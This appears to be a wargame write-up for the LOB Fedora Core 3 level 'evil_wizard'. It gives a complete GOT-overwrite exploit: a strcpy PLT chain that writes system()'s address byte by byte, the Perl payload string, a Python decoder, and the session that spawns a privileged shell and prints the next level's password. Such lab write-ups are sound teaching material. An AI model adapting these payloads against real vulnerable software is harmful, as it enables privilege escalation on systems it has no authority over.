
[LOB_FC3] hell_fire -> evil_wizard

by bbolmin 2014. 7. 19.



#Env 


- NX

- ascii armor

- random stack


#Technique


- GOT overwrite

- strcpy PLT chain



evil_wizard.c source



Because everything after buffer+length is wiped, there is no argument left to use for a ret sled. A different method is needed, and the hint given is GOT overwriting.

The challenge binary also sets privileges with setreuid, so running the system function through a GOT overwrite is enough.




* Overwrite printf's GOT entry with the address of the system function

- address of system(): 0x7507c0

- printf's PLT: 0x8048424

- printf's GOT: 0x8049884

- pop-pop-ret: 0x0804854f (provided by the challenge)

- strcpy's PLT: 0x8048494

- address of "/bin/sh": 0x833603



[ Building the strcpy call chain ]


strcpy PLT | pop-pop-ret | printf GOT   | &(0xc0)

strcpy PLT | pop-pop-ret | printf GOT+1 | &(0x07)

strcpy PLT | pop-pop-ret | printf GOT+2 | &(0x75)

strcpy PLT | pop-pop-ret | printf GOT+3 | &(0x00)

&system (printf's PLT) | dummy | &"/bin/bash"



Exploit string: "`perl -e 'print "a"x268, "\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x84\x98\x04\x08", "\x2c\x85\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x85\x98\x04\x08", "\xb0\x83\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x86\x98\x04\x08", "\xe9\x82\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x87\x98\x04\x08", "\x1b\x98\x04\x08", "\x24\x84\x04\x08", "a"x4, "\x03\x36\x83"'`"
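As an added example (not part of the original writeup), the decoder below takes the argv[1] string above, splits it into the four strcpy frames plus the final call, and replays the one-byte copies to show that printf's GOT slot ends up holding system's address 0x7507c0. The address-to-byte mapping is read off the chain table above; the chain needs one-byte copies because the ASCII-armored libc address starts with a 0x00 byte that strcpy would stop at, and it needs a writable GOT, which full RELRO would take away.

```python
import struct

# Addresses quoted in the writeup above (32-bit little-endian binary).
STRCPY_PLT = 0x08048494
POP_POP_RET = 0x0804854f
PRINTF_GOT = 0x08049884
PRINTF_PLT = 0x08048424
SYSTEM_ADDR = 0x007507c0   # ASCII-armored libc: high byte is 0x00, so strcpy cannot copy it whole
BINSH_ADDR = 0x00833603
PAD = 268                  # bytes of "a" that fill the buffer up to the saved return address

# One-byte sources used by the chain (address -> byte stored there), read off the chain table above.
BYTE_SOURCES = {0x0804852c: 0xc0, 0x080483b0: 0x07, 0x080482e9: 0x75, 0x0804981b: 0x00}

# The argv[1] string from the writeup, re-typed as a Python bytes literal.
PAYLOAD = (
    b"a" * PAD
    + b"\x94\x84\x04\x08\x4f\x85\x04\x08\x84\x98\x04\x08\x2c\x85\x04\x08"
    + b"\x94\x84\x04\x08\x4f\x85\x04\x08\x85\x98\x04\x08\xb0\x83\x04\x08"
    + b"\x94\x84\x04\x08\x4f\x85\x04\x08\x86\x98\x04\x08\xe9\x82\x04\x08"
    + b"\x94\x84\x04\x08\x4f\x85\x04\x08\x87\x98\x04\x08\x1b\x98\x04\x08"
    + b"\x24\x84\x04\x08" + b"a" * 4 + b"\x03\x36\x83"
)

def decode_chain(payload, pad=PAD):
    """Split the overflow into strcpy frames plus the final call. Each frame is
    [strcpy@plt][pop-pop-ret][dst][src]; pop-pop-ret drops dst and src and returns into the next."""
    data = payload[pad:]
    ops, off = [], 0
    while off + 16 <= len(data) and struct.unpack_from("<I", data, off)[0] == STRCPY_PLT:
        _, ret, dst, src = struct.unpack_from("<IIII", data, off)
        if ret != POP_POP_RET:
            raise ValueError("frame at +%d does not return into pop-pop-ret" % off)
        ops.append((dst, src))
        off += 16
    target, _dummy_ret = struct.unpack_from("<II", data, off)
    # The argument is only 3 bytes long: argv's NUL terminator supplies the 0x00 high byte.
    arg = struct.unpack("<I", data[off + 8:off + 12].ljust(4, b"\x00"))[0]
    return ops, target, arg

def got_value_after_chain(ops, byte_sources, got=PRINTF_GOT):
    """Replay the one-byte copies and return the value left in printf's GOT slot."""
    slot = bytearray(4)
    for dst, src in ops:
        slot[dst - got] = byte_sources[src]
    return struct.unpack("<I", bytes(slot))[0]

if __name__ == "__main__":
    ops, target, arg = decode_chain(PAYLOAD)
    print("printf GOT -> 0x%08x, then 0x%08x(0x%08x)" % (got_value_after_chain(ops, BYTE_SOURCES), target, arg))
```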




[hell_fire@Fedora_1stFloor ~]$ ./evil_wizard "`perl -e 'print "a"x268, "\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x84\x98\x04\x08", "\x2c\x85\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x85\x98\x04\x08", "\xb0\x83\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x86\x98\x04\x08", "\xe9\x82\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x87\x98\x04\x08", "\x1b\x98\x04\x08", "\x24\x84\x04\x08", "a"x4, "\x03\x36\x83"'`"

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaX輯봑?봑뀺봑녽봑$aaaa6?

sh-3.00$ id

uid=504(evil_wizard) gid=504(evil_wizard) groups=503(hell_fire) context=user_u:system_r:unconfined_t

sh-3.00$ my-pass

euid = 504

get down like that

sh-3.00$



